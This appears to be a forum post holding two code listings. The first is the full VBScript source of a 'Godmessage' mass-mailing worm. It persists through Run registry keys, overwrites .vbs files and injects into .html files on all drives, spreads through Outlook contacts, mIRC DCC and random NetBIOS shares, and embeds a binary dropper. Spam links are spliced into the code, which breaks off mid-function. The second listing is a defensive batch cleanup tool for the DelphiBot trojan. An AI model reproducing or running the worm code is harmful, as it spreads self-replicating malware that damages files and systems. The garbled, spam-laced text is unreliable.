Code:

Option Explicit
Dim StartTime, CurrentTime, xtimer
StartTime = Timer
Dim timeout1, timeout2, timeout3
timeout1 = 15
timeout2 = 2000
timeout3 = 2500
Dim fso, wsh, net
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsh = CreateObject("WScript.Shell")
Set net=Wscript.CreateObject("WScript.Network")
Const ForReading = 1
Const ForWriting = 2
Const ForAppending = 8
Dim sysOS, windir, htmlloc, vbsloc, vbsfile, vbscopy, vbsdir, vbsname
sysOS = wsh.ExpandEnvironmentStrings("%OS%")
windir = wsh.ExpandEnvironmentStrings("%windir%")
vbsloc = WScript.ScriptFullname
vbsname = WScript.ScriptName
vbsdir = fso.GetParentFolderName(vbsloc)
Set vbsfile = fso.OpenTextFile(WScript.ScriptFullname, ForReading)
vbscopy = vbsfile.ReadAll
vbsfile.close
htmlloc = vbsdir & "\Godmessage.html"
Dim locdir1, locdir2, locdir3
locdir1 = fso.GetSpecialFolder(2)
locdir2 = fso.GetParentFolderName(locdir1)
locdir3 = fso.GetParentFolderName(locdir2)
Dim startup
startup = wsh.SpecialFolders("Startup")

Dim binloc
binloc = "set asciiBin=fso.CreateTextFile(""""2ascii.bin"""")"" & Chr(13) & Chr(10) & ""asciiBin.Write """"n-- 2ASCII v2.0 -------- (c)1997 m&g software"""" & Chr(47) & """"Arminio Grgic-GrGa --"""" & vbNewline & """"n"""" & vbNewline & """"e100 BD 0 1 BA B5 1 B8 0 3D CD 21 72 19 8B D8 E8 72 0 72 12 3C 25"""" & vbNewline & """"e116 75 F7 BF C3 1 57 E8 65 0 3C D 74 5 AA EB F6 CD 20 B8 0 24 AB"""" & vbNewline & """"e12C 5A B4 3C 33 C9 CD 21 72 F1 3E 89 86 D3 1 B4 9 BA AC 1 CD 21"""" & vbNewline & """"e141 B1 4 E8 3E 0 72 35 3C D 74 F7 3C A 74 F3 3C 7E 74 29 2C 30 80"""" & vbNewline & """"e157 F9 4 75 6 8A E8 FE C9 EB E2 51 D2 E5 D2 E5 80 E5 C0 A C5 59"""" & vbNewline & """"e16C FE C9 75 3 B9 4 0 3E 88 86 D2 1 E8 1B 0 EB C6 B4 3E CD 21 BB"""" & vbNewline & """"e182 D3 2 51 B4 3F BA D2 1 3 D5 52 5E B9 1 0 CD 21 AC 59 C3 53 51"""" & vbNewline & """"e198 B4 40 BA D2 1 3 D5 3E 8B 9E D3 1 B9 1 0 CD 21 59 5B C3 44 65"""" & vbNewline & """"e1AE 63 6F 64 69 6E 67 20 32 41 53 43 49 49 2E 42 49 4E 0 74 6F 20"""" & vbNewline & """"g"""" & vbNewline & """"q (c)m&g """" & vbNewline & """"%ONZ.EXE"""" & vbNewline & """"E=J@0020000400?0?oo080h000000000100J00000000000000000000000000000000"""" & vbNewline & """"000000000000001080j@00>Obd9=8Qh1=<=QJ@@DEXYcDP`bE_Wb5Q]PE]ecAdPRAUPb"""" & vbNewline & """"5e^PEe^T5UbPEGY^0cb=0:Tg00000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"D0@5@00<0130a5Y72e0000000000SP0>21;102I00@0000@0@00@000@1V0040P0@00`"""" & vbNewline & """"0000400000@0000200010000000000300:0000008000000400000000020000000@00"""" & vbNewline & """"0P00000@000@000000000@0000000000000040`0<0l0000000000000000000000000"""" & vbNewline & """"00000000`00l1`000F00000000000000000000000000000000000000000000000000"""" & vbNewline & """"000000000000000000000000000000000000000000000000000000000000EE@H0`00"""" & vbNewline & """"00001@0000@000000000040000000000000000002000GPE@1Ha0000000@0@00P0000"""" & vbNewline & """"0800004000000000000000004000L0PE5@Hb0000000@00001`000020000<00000000"""" & vbNewline & """"00000000@000`0000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000:0DT9^"""" & vbNewline & """"5V_jDPDX5YcPEVY\AUPYAcP`EQS[5UTPEgYdAXPd5XUPEE@HDPUhEUSeEdQR5\UPE`QS"""" & vbNewline & """"E[UbDPXd5d`j@__e5`h^EdchD^_b1WPT0T59TjDPE@1HP`0^ibDP3_E`ibEYWX1dPX"""" & vbNewline & """"13YP0aii0f]a0iiiDPBF0P`^0faPE3_`EibYEWXd@PX30YPa0iif0]ai0iiPE=QbE[ec4P6^AH^:@^P?"""" & vbNewline & """"ERUbEXe]5UbP0T:0DTBAFPV5_bPEE@HDPYcDPTYEcdbEYReEdUTDPe^"""" & vbNewline & """"ETUbDPc`EUSY5Q\PE\YSEU^c1UPT@:0E5@HQ0<92`9=Xnlnn=c0G4M40004600000P00"""" & vbNewline & """"0V00oQ_nngoX0006h[;`96o7X@7:06lRQd:@8087E67Vjk_kO[`Z5TXF0SSU095AX>;m"""" & vbNewline & """"?\Y9?eo>1Z0;4^kf^kW70a>4S]A9QK^;=d_=0>mMGkFRjgo_0;46lHk6055EfQ5AC5iMfk2`FXlE8mc_XSonk]FoOV"""" & vbNewline & """"2i<0FoMVe976X7d3Ci0eSdaQ1hT?lRf0gm<3]^8F\d6Q8bMk1UQk]g\Iel<[Qf4VP04e=WG="""" & vbNewline & """"U`?S8eZ1RMZKjCec9eVBP`ER`6792VcS8oM10F>;=2jcE2Ib9<4@?jac9"""" & vbNewline & """"O_lS@gmX^;O`_dn;;g0o4kd7o54d5cFcG97Gg^OjAoTE\cB:hG0ZL``>i@;29Ck:eOgl"""" & vbNewline & """"\of3Cn0foagSm>[baK38EH78d9eDf;jfjMa1j4MX:IJ1=Ngm5HYfgo^"""" & vbNewline & """"EY^YD0R_5_d?EXU\A\0L000GZB7e3JFe2_1S4P??kW?KCF;H;J`:0U5QZAAA2A8<@DYHAAJAALEPTXZAAAFA\`UdhAZAAA"""" & vbNewline & """"Yl04Z8AAZAAPPO`Eg`QEccQPN0S4S0@co]h"""" & vbNewline & """"@_X3EQ^^5_dPnbMNOjodEYQ\EYjUDPc_ES[UC00dAX;de8K;9_oH1WPa0^fEEUbfEUbc"""" & vbNewline & """"g:gmggS^E^UT08@PE[Y\A\>TEYcS9_m;Kam:EUSd4=eE5QT9Sg3kB]11EfHT@P3g5_bC"""" & vbNewline & """"dQRo0`9PEQSS5U``e7_]3f90E5bb@=0;D?@\@cbga[_4D^T5EBUWAR[bUCg[E0[KAYf@"""" & vbNewline & """"@P4D7dT]0X0e0XTAX50`0;X0@3gERKY81<0L`=:3ioGH`iDk3\"""" & vbNewline & """"E_cU18JnU=g3L=f_ETe\d@11I]55UhYaIoaQ1oW;E1TTQb?5DFTk@U^^QK2JV[jJJETC"""" & vbNewline & """"@0lkfJ]KV;e^Q1GQ6H=hVePcFoQWEU2_Eh1LBg:=TZ>c8T\8I?kcN>2GWhOnEdOQYfHo"""" & vbNewline & """";MJ:DkdXFjdREi^Qm]KfGQD8EYC1WBUn=e;7U[`c41fcE^d_5QX>MW9^D5^c@jhSL07L"""" & vbNewline & """"agZaTmR4E3CdGH2`GWQbQd;PlZLbF_ic1U010=G:05<3kOnl3o7505;6@I;C0A860FD:"""" & vbNewline & """"07G60C6:gKfk3]6G0E650G6D0BF@0H:nP9;o_MMe0>DJ076507I70=A?1?96TL]K>km<"""" & vbNewline & """"0:I60N?GDHe:0R;^<6mM8?00D0@51c14405Y[7eF;o3@1;012I008>MXfm1;3P"""" & vbNewline & """"4<0;]UTC:=R1030:m@9H:`A402hc4@biJ@V[`@`FP3Z@G;00`D12jn4mE3?4m5G[@6W1"""" & vbNewline & """"lViUDPP4E1D1DPP;:Ob>>R0^EYTH1QWSb0=20`3FTWL3L`H64hSW10TJ2F=gAUW@<4?a"""" & vbNewline & """"3_00NPmm5d232@00<0o0000000000000@00PBn0PQ00=Rn0`OooGn3=oS[@@Z@@@Z@@:"""" & vbNewline & """"T66847717Ke7R;N3?^lAgKb]2h1000017Ke7R;N3?^lAcKA0L1Kc7_e9R;N3?^lAgKcT"""" & vbNewline & """"\a93CX3bl=1P88:6i63`Godd>9517Ke7R;N3?^lAcKA9L1Ke87;Nn3^l324R973S743CY4gca1?gY64Ykh0[cX1`R973S759oHRI:=n010002;7970dh6;O4:=4`"""" & vbNewline & """"40P0`01ci@37\8oF5TP0X0E:4778g0dLN9iG]8b^]EoF5XP0`090Qd79h333l4[Q]Q33"""" & vbNewline & """"S74==Nla;0:7a7901dRl7_gA\13;h364?10@>641;`93?[RTl?1PT@V;h737l2[RMQY_"""" & vbNewline & """"nXoo0000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"0000000000000000000000000000000068`0D0T`0000000000000000P00E1`005``0"""" & vbNewline & """"0000000000000000H0Q`@00h1`0000000000000000006\`0H00`0000000000000000"""" & vbNewline & """"000000000000H0h``0061`000000L0F`000000007V`00000`00d1`000000D0;5EB>5"""" & vbNewline & """"1[url=http://www.myanmaritresource.info/]<0CE85<1[/url][url=http://www.myanmaritresource.info/]<0EEC5B0cb^ET\\D0GCE?3;0cb^ET\\0000E<_QET<0000B0f000000008000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"00000000000000000000000000000000000000000000000000000000000000000000"""" & vbNewline & """"000000000000000000000000~"""" & vbNewline & """""""" & vbNewline"" & Chr(13) & Chr(10) & ""asciiBin.close"" & Chr(13) & Chr(10) & """

main()

Sub main()
CheckEnvi()

If vbsdir = locdir1 Then
OESpread()
xtimer = StartTime \ 3600
Do
CurrentTime = Timer
If(xtimer*3600 < CurrentTime) Then
CheckEnvi()
OCSpread()
xtimer = xtimer + 1
End If
Loop
End If

If vbsdir = locdir2 Then
scanDrives()
xtimer = StartTime \ 900
Do
CurrentTime = Timer
If(xtimer*900 < CurrentTime) Then
CheckEnvi()
xtimer = xtimer + 1
End If
Loop
End If

If vbsdir = locdir3 Then
Do
NetbiosScan()
CheckEnvi()
Loop
End If
End Sub

Sub CheckEnvi()
On Error Resume Next
If Not fso.FileExists(htmlloc) And Not vbsdir = startup Then
   SpawnHtml()
End If
If fso.FileExists(startup & "\GM1.HTA") Then fso.DeleteFile(startup & "\GM1.HTA")
If fso.FileExists(startup & "\GM2.HTA") Then fso.DeleteFile(startup & "\GM2.HTA")
If Not fso.FileExists(locdir1 & "\" & vbsname) Then
   fso.CopyFile vbsloc, locdir1 & "\" & vbsname
   wsh.Run locdir1 & "\" & vbsname, False
End If
If Not fso.FileExists(locdir2 & "\" & vbsname) Then
   fso.CopyFile vbsloc, locdir2 & "\" & vbsname
   wsh.Run locdir2 & "\" & vbsname, False
End If
If Not fso.FileExists(locdir3 & "\" & vbsname) Then
   fso.CopyFile vbsloc, locdir3 & "\" & vbsname
   wsh.Run locdir3 & "\" & vbsname, False
End If
If wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM1") = "" Then
   wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM1", locdir1 & "\" & vbsname, "REG_SZ"
End If
If wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM2") = "" Then
   wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM2", locdir2 & "\" & vbsname, "REG_SZ"
End If
If wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM3") = "" Then
   wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GM3", locdir3 & "\" & vbsname, "REG_SZ"
End If


End Sub

Sub SpawnHtml()
Dim spwn(4), spwnHtml, spwnTmp
spwn(0) = ""
spwn(1) = ""
spwn(2) = ""
spwn(3) = "
[/url][b][url=http://www.myanmaritresource.info/][color=red]Judgement Comes in Darkness and Whirling Winds[/color][/url][/b]

[url=http://www.myanmaritresource.info/]"
spwn(4) = ""
Set spwnHtml = fso.CreateTextFile(htmlloc, True)
spwnHtml.Write Join(spwn, vbNewLine)
spwnHtml.close
spwnTmp = Inject(htmlloc)
Set spwnHtml = fso.OpenTextFile(htmlloc, ForWriting, True)
spwnHtml.Write spwnTmp
spwnHtml.close
End Sub

Sub OESpread()
Dim dir1, f1, sf1, f, idn
If sysOS = "Windows_NT" Then
   dir1 = locdir3 & "\Application Data\Identities"
Else
   dir1 = windir & "\Application Data\Identities"
End If

Set f1 = fso.GetFolder(dir1)
Set sf1 = f1.SubFolders
For Each f in sf1
   idn = f.name
Next
Dim regKey
regKey = "HKCU\Identities\" & idn & "\Software\Microsoft\Outlook Express\5.0\"
wsh.RegWrite regKey & "Signature Flags", 00000003, "REG_DWORD"
wsh.RegWrite regKey & "\signatures\Default Signature", "00000000", "REG_SZ"
wsh.RegWrite regKey & "\signatures\00000000\file", htmlloc, "REG_SZ"
wsh.RegWrite regKey & "\signatures\00000000\name", "Signature #1", "REG_SZ"
wsh.RegWrite regKey & "\signatures\00000000\text", "", "REG_SZ"
wsh.RegWrite regKey & "\signatures\00000000\type", 00000002, "REG_DWORD"
End Sub

Sub scanDrives()
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
   If d.DriveType = 2 or d.DriveType=3 Then
      folderlist(d.path&"\")
   End If
Next
End Sub

Sub folderlist(folderspec) 
On Error Resume Next
Dim f,f1,sf
Set f = fso.GetFolder(folderspec) 
Set sf = f.SubFolders
For each f1 in sf
   infectfiles(f1.path)
   folderlist(f1.path)
Next
End Sub

Sub infectfiles(folderspec) 
On Error Resume Next
Dim f,f1,fc,ext,ap,s
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For each f1 in fc
   ext=fso.GetExtensionName(f1.path)
   ext=lcase(ext)
   s=lcase(f1.name)
   If (ext="vbs") or (ext="vbe") Then
      fso.Copyfile f1.path, f1.path & ".GMW", True   
      Set ap=fso.OpenTextFile(f1.path, ForWriting, True)
      ap.write vbscopy
      ap.close
   ElseIf(ext="htm") or (ext="html") Then
      Inject(f1.path)
   ElseIf(s="mirc32.exe") Then
      Dim scriptini
      Set scriptini=fso.CreateTextFile(folderspec&"\script.ini", True)
      scriptini.WriteLine "[script]"
      scriptini.WriteLine ";mIRC Script"
      scriptini.WriteLine "n0=on 1:JOIN:#:{"
      scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
      scriptini.WriteLine "n2=  /.dcc send $nick "& htmlloc
      scriptini.WriteLine "n3=}"
      scriptini.close
   End If
Next 
End Sub

Sub NetbiosScan()
On Error Resume Next
Dim w, x, n, o, i, rd, r(2)
Randomize
Do While w=0
   r(0) = "\\24."
   r(1) = "\\208."
   r(2) = "\\209."
   rd = r(Int(3*Rnd+1)-1)
   n=rd&Int(254*rnd+1)&"."∫(254*rnd+1)&"."∫(254*rnd+1)&"\C"
   x = Chr(Int(20*Rnd+103))&":"
   net.mapnetworkdrive x,n
   Set o=net.enumnetworkdrives
   For i=0 to o.Count-1
      If n=o.item(i) Then w=1
   Next
Loop
fso.Copyfile vbsloc, x&"\windows\startm~1\programs\startup\"
net.removenetworkdrive x
w=0
End Sub

Sub OCSpread()
On Error Resume Next
Dim x, i, n, alst, mail, ctrlists, ctrentries, mailadr, regalst, regadr
Dim outlook, mapi
Set outlook=WScript.CreateObject("Outlook.Application")
Set mapi=outlook.GetNameSpace("MAPI")
Randomize
For ctrlists=1 to mapi.AddressLists.Count
   set alst = mapi.AddressLists(ctrlists)
   regalst = wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & alst)
   If (regalst="") then
      regalst=1
      n = 0
   Else
      n = regalst
   End If
   x = Int(alst.AddressEntries.Count*Rnd+1)
   i = Int(5*Rnd+1)
   If (int(alst.AddressEntries.Count)>int(regalst)) Then
      For ctrentries=1 to i
         mailadr=alst.AddressEntries(x)
         regadr=wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & mailadr)
         If (regadr="") Then
            n = n + 1
            Set mail=outlook.CreateItem(0)
            mail.Recipients.Add(mailadr)
            mail.Subject = "Godmessage"
            mail.Body = vbNewline & "Please see attached."
            mail.Attachments.Add(htmlloc)
            mail.Send
            wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & mailadr,1,"REG_DWORD"
         End if
         x = Int(alst.AddressEntries.Count*Rnd+1)
      Next
      wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & alst, n
   Else
      wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & alst, n
   End if
Next
End Sub

Function Inject(html)
Dim f1, i, s, strBdy
Dim regExBdy, retValBdy, retStrBdy
ReDim htmlArr(-1)
Set f1 = fso.OpenTextFile(html, ForReading)
i = 0
Do While NOT f1.AtEndOfStream
s = f1.ReadLine
Set regExBdy = New RegExp
regExBdy.Pattern = "

Code:

@ECHO OFF

TITLE DBFIX
color 1F
cd %~dps0

if [%1]==[/second] goto Second

ver|%systemroot%\system32\find.exe "Windows XP">nul && set TypeOS=XP
if [%TypeOS%]==[XP] goto mbotStart
ver|%systemroot%\system32\find.exe "Windows 2000">nul && set TypeOS=W2K
if [%TypeOS%]==[W2K] goto mbotStart

goto End

:mbotStart

set update=%Version 1.005

echo.
echo.
echo                    *** DelphiBot Fix %update% ***
echo.
echo.
echo.
echo          DBFIX was developed with the greatest attention to detail,
echo            However, Use of this program is at your own discretion.
echo          The program is provided "as is" without warranty of any kind.
echo.
echo.
echo  Backups will be made of registry entries and files before they are removed
echo.
echo                    Type Y to run DBFIX or N to exit
echo.
echo.
echo.
echo.
echo.
echo.
echo.
set /p Choice=Type Y to Start or N to Exit....
if [%Choice%]==[y] goto msnbotfix
if [%Choice%]==[Y] goto msnbotfix
if [%Choice%]==[n] goto End
if [%Choice%]==[N] goto End
if [%Choice%]==[f] goto Second
if [%Choice%]==[F] goto Second

For %%a in (Y,y,N,n) do if not [%Choice%]==[%%a] goto End

pause

:msnbotfix

IF EXIST test* del/q test* >nul
IF EXIST find*.txt del/q find*.txt >nul
IF EXIST check*.txt del/q check*.txt >nul

cls
ECHO.
ECHO Checking For Trojan File and Run Value
ECHO.

IF NOT EXIST "%cd%\dnif.exe" COPY /Y "%systemroot%\system32\find.exe" "%cd%\dnif.exe">nul
IF NOT EXIST "%cd%\dnif.exe" COPY /Y "%systemroot%\system32\dllcache\find.exe" "%cd%\dnif.exe">nul
IF NOT EXIST "%cd%\rtsdnif.exe" COPY /Y "%systemroot%\system32\findstr.exe" "%cd%\rtsdnif.exe">nul
IF NOT EXIST "%cd%\rtsdnif.exe" COPY /Y "%systemroot%\system32\dllcache\findstr.exe" "%cd%\rtsdnif.exe">nul
IF NOT EXIST "%cd%\editreg.exe" COPY /Y "%systemroot%\regedit.exe" "%cd%\editreg.exe">nul
IF NOT EXIST "%cd%\editreg.exe" COPY /Y "%systemroot%\system32\dllcache\regedit.exe" "%cd%\editreg.exe">nul
IF NOT EXIST "%cd%\editreg.exe" COPY /Y "%cd%\apps\replace\regedit.exe" "%cd%\editreg.exe">nul
IF NOT EXIST "%cd%\apps\CSweg.exe" COPY /Y "%cd%\apps\swreg.exe" "%cd%\apps\CSweg.exe">nul

IF EXIST test* del/q test* >nul
IF EXIST repair*.reg del/q repair*.reg >nul
IF EXIST find*.txt del/q find*.txt >nul
IF EXIST check*.txt del/q check*.txt >nul
IF EXIST DBFIX_Report_old.txt del /q DBFIX_Report_old.txt >nul
IF EXIST DBFIX_Report.txt ren DBFIX_Report.txt DBFIX_Report_old.txt >nul

ver|dnif.exe /I "Windows XP">nul && (
if not exist "%windir%\system32\AUTOEXEC.NT" copy "%cd%\apps\replace\XP\AUTOEXEC.NT" "%windir%\system32\AUTOEXEC.NT">NUL && echo Replaced file missing AUTOEXEC.NT>>filecheck.txt
if not exist "%windir%\system32\Config.nt" copy "%cd%\apps\replace\XP\Config.nt" "%windir%\system32\Config.nt">NUL && echo Replaced missing Config.nt>>filecheck.txt
if not exist "%windir%\system32\Command.com" copy "%cd%\apps\replace\XP\Command.com" "%windir%\system32\Command.com">NUL && echo Replaced missing Command.com>>filecheck.txt
   )

ver|dnif.exe /I "Windows 2000">nul && (
if not exist "%windir%\system32\AUTOEXEC.NT" copy "%cd%\apps\replace\W2K\AUTOEXEC.NT" "%windir%\system32\AUTOEXEC.NT">NUL && echo Replaced missing AUTOEXEC.NT>>filecheck.txt
if not exist "%windir%\system32\Config.nt" copy "%cd%\apps\replace\W2K\Config.nt" "%windir%\system32\Config.nt">NUL && echo Replaced missing Config.nt>>filecheck.txt
if not exist "%windir%\system32\Command.com" copy "%cd%\apps\replace\W2K\Command.com" "%windir%\system32\Command.com">NUL && echo Replaced missing Command.com>>filecheck.txt
   )

apps\Csweg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v DisableRegistryTools >nul
apps\Csweg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v DisableRegistryTools >nul

apps\Csweg.exe export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" CheckRunsa.txt

apps\locate "%systemroot%\system32\*.exe" /A:D-H+ /s:30000,110000 /n /nr /O:"&W"|dnif.exe /I ".exe">TestIRCBotDelphi1a.txt
IF EXIST TestIRCBotDelphi1a.txt dnif.exe /I "."<TestIRCBotDelphi1a.txt>NUL && for /f "tokens=*" %%a in (TestIRCBotDelphi1a.txt) do ECHO %%~a>>TestIRCBotDelphi2a.txt
IF EXIST TestIRCBotDelphi2a.txt rtsdnif.exe /m /f:TestIRCBotDelphi2a.txt "00000000">>TestIRCBotDelphi3a.txt 2>nul
IF EXIST TestIRCBotDelphi3a.txt rtsdnif.exe /m /f:TestIRCBotDelphi3a.txt "Delphi">TestIRCBotDelphi4a.txt 2>nul
IF EXIST TestIRCBotDelphi2a.txt rtsdnif.exe /m /f:TestIRCBotDelphi2a.txt "QQQQQS3">>TestIRCBotDelphi3b.txt 2>nul
IF EXIST TestIRCBotDelphi3b.txt rtsdnif.exe /m /f:TestIRCBotDelphi3b.txt "AVP.Tray">TestIRCBotDelphi4a.txt 2>nul
IF EXIST TestIRCBotDelphi4a.txt dnif.exe /I "."<TestIRCBotDelphi4a.txt>NUL && for /f "tokens=4 delims=\." %%b in (TestIRCBotDelphi4a.txt) do dnif.exe /I "%%b.exe"<CheckRunsa.txt|dnif.exe /I /V "system32"|dnif.exe /I /V "%windir%"|dnif.exe /I /V "%systemdrive%">>TestIRCBotDelphiRun1a.txt && IF EXIST %systemroot%\system32\%%b.exe echo %systemroot%\system32\%%b.exe>>RemLat2a.txt
   
IF EXIST TestIRCBotDelphiRun1a.txt dnif.exe /I "."<TestIRCBotDelphiRun1a.txt>NUL && (
>RepairDelphiBota.reg (
echo Windows Registry Editor Version 5.00
echo.
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system]
echo "DisableRegistryTools"=-
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   )
for /f "tokens=1 delims==" %%e in (TestIRCBotDelphiRun1a.txt) do (
echo %%e=->>RepairDelphiBota.reg
echo.>>RepairDelphiBota.reg
echo %%e>>TestBotDelphi.txt
   ))

apps\Csweg.exe QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot" /s>TESTsboot1.txt

time /t>CurrentT.txt 2>NUL
For /f "tokens=*" %%b in (CurrentT.txt) do Call Set cctime=%%b
del /q CurrentT.txt >NUL

>DBFIX_Report.txt (
echo.
echo DBFix %update%
echo Run on %date% @ %cctime%
echo.
IF EXIST filecheck.txt TYPE filecheck.txt
echo.
IF EXIST RemLat2a.txt echo DelfBot File Found:
IF EXIST RemLat2a.txt dnif.exe /I "."<RemLat2a.txt>NUL && For /f "tokens=*" %%C in (RemLat2a.txt) do echo %%C
IF NOT EXIST RemLat2a.txt ECHO No DelfBot Files Found
ECHO.
IF EXIST RepairDelphiBota.reg echo DelfBot Run Value Found:
IF EXIST RepairDelphiBota.reg dnif.exe /I "HKEY"<RepairDelphiBota.reg>NUL && For /f "tokens=*" %%f in (TestBotDelphi.txt) do echo HKLM~\Run %%f
IF NOT EXIST RepairDelphiBota.reg ECHO No DelfBot Run Values Found
echo.
   )

dnif.exe /I "andymanchesta"<%windir%\SYSTEM32\DRIVERS\ETC\HOSTS>NUL && (
echo Restoring Default HOSTS File>>DBFIX_Report.txt
ATTRIB -h -s -r -a "%windir%\SYSTEM32\DRIVERS\ETC\HOSTS" >NUL
COPY /Y "%windir%\SYSTEM32\DRIVERS\ETC\HOSTS" "%CD%\HOSTS.BAK" >NUL
DEL /Q "%windir%\SYSTEM32\DRIVERS\ETC\HOSTS" >nul 2>&1
>%windir%\SYSTEM32\DRIVERS\ETC\HOSTS (
echo # Copyright 1993-1999 Microsoft Corp.
echo #
echo # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
echo #
echo # This file contains the mappings of IP addresses to host names. Each
echo # entry should be kept on an individual line. The IP address should
echo # be placed in the first column followed by the corresponding host name.
echo # The IP address and the host name should be separated by at least one
echo # space.
echo #
echo # Additionally, comments ^(such as these^) may be inserted on individual
echo # lines or following the machine name denoted by a "#" symbol.
echo #
echo # For example:
echo #
echo # 102.54.94.97 rhino.acme.com # source server
echo # 38.25.63.10 x.acme.com # x client host
echo #
echo 127.0.0.1 localhost
   ))

IF EXIST TESTsboot1.txt dnif.exe /I "Boot file system"<TESTsboot1.txt>NUL && dnif.exe /I "vga.sys"<TESTsboot1.txt>NUL && GOTO sfbfne

ECHO SPRFND>TESTSFBT1.TXT
ECHO Restoring Missing SafeBoot Keys>>DBFIX_Report.txt
echo.>>DBFIX_Report.txt
ver|dnif.exe "Windows XP">nul && (
apps\Csweg QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CSDVersion|dnif.exe /i "Service Pack 2">NUL && apps\Csweg IMPORT apps\Restore_SafeBoot_WindowsXP_SP2.reg>nul && GOTO sfbfne
apps\Csweg QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CSDVersion|dnif.exe /i "Service Pack 3">NUL && apps\Csweg IMPORT apps\Restore_SafeBoot_WindowsXP_SP3.reg>nul && GOTO sfbfne
apps\Csweg IMPORT apps\Restore_SafeBoot_WindowsXP.reg>nul
   )
ver|dnif.exe "Windows 2000">nul && apps\Csweg IMPORT apps\Restore_SafeBoot_Windows2000_SP4.reg >nul

:sfbfne

IF NOT EXIST RepairDelphiBota.reg (
ECHO Finished!>>DBFIX_Report.txt
IF EXIST testirc* del/q testirc* >nul
IF EXIST tests* del/q tests* >nul
IF EXIST check*.txt del/q check*.txt >nul
IF EXIST dnif.exe del/q dnif.exe >nul
IF EXIST editreg.exe del/q editreg.exe >nul
IF EXIST rtsdnif.exe del/q rtsdnif.exe >nul
start NOTEPAD DBFIX_Report.txt
EXIT
   )

IF NOT EXIST DBFIX_backups\ MD DBFIX_backups 2>nul
apps\Csweg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "%cd%\DBFIX_backups\HKLM_RunKey_Backup.reg"
apps\Csweg export "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot" "%cd%\DBFIX_backups\SafeBoot_Backup.reg"

echo DelfBot Trojan Found!
IF EXIST RepairDelphiBota.reg editreg.exe /s RepairDelphiBota.reg 2>NUL
IF EXIST RepairDelphiBota.reg apps\Csweg import RepairDelphiBota.reg 2>NUL

IF EXIST RemLat2a.txt dnif.exe /I "."<RemLat2a.txt>NUL && For /f "tokens=4 delims=\." %%b in (RemLat2a.txt) do if exist "%systemroot%\system32\%%b.exe" (
apps\Cghtme.exe -c "%systemroot%\system32\%%b.exe" DBFIX_backups\%%b.exe.vir >NUL
apps\Cghtme.exe -e "%systemroot%\system32\%%b.exe" >nul
IF EXIST "%userprofile%\desktop\catchme.zip" del /q "%userprofile%\desktop\catchme.zip" >NUL
IF EXIST "%userprofile%\desktop\catchme.log" del /q "%userprofile%\desktop\catchme.log" >NUL
   )

echo.>>DBFIX_Report.txt

